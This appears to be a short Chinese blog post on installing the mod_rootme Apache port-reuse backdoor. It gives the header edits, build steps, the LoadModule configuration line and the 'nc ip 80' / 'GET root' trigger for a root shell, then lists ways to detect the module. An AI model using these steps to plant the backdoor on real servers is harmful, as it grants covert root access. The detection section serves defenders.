Tomato's Blog

Apache端口复用后门

测试环境

CentOSx64 6.5
Apache2.5

0x01 利用方式

先修改后门的里面的httpd22.h文件,不修改的话,在apache启动的时候会报错

:
#define MODULE_MAGIC_COOKIE 0x41503230UL
改为:
#define MODULE_MAGIC_COOKIE 0x41503232UL

:
#define MODULE_MAGIC_NUMBER_MAJOR 20020903
改为:
#define MODULE_MAGIC_NUMBER_MAJOR 20051115

然后保存。输入make linux进行编译

185317750

然后修改/etc/httpd/conf/httpd.conf

添加 LoadModule rootme22_module modules/mod_rootme22.so 加载这个模块。

然后启动apache

然后使用就可以连接80端口 nc ip 80 然后输入GET root

4195482967

成功获取shell

0x02 检测方式

1.通过ps -ef grep httpd 可以看到有root用户使用的httpd子进程

67507677

然后可以进一步去查看apache配置文件

2.通过

ps -ef | grep http | head -n 1 | awk '{system("ls -l /proc/"$2"/fd")}' | grep pipe | wc -l

正常情况下是64,加载了mod_rootme后是66

3.在web目录下写个phpinfo看是否加载了mod_rootme模块

comments powered by Disqus
GoTop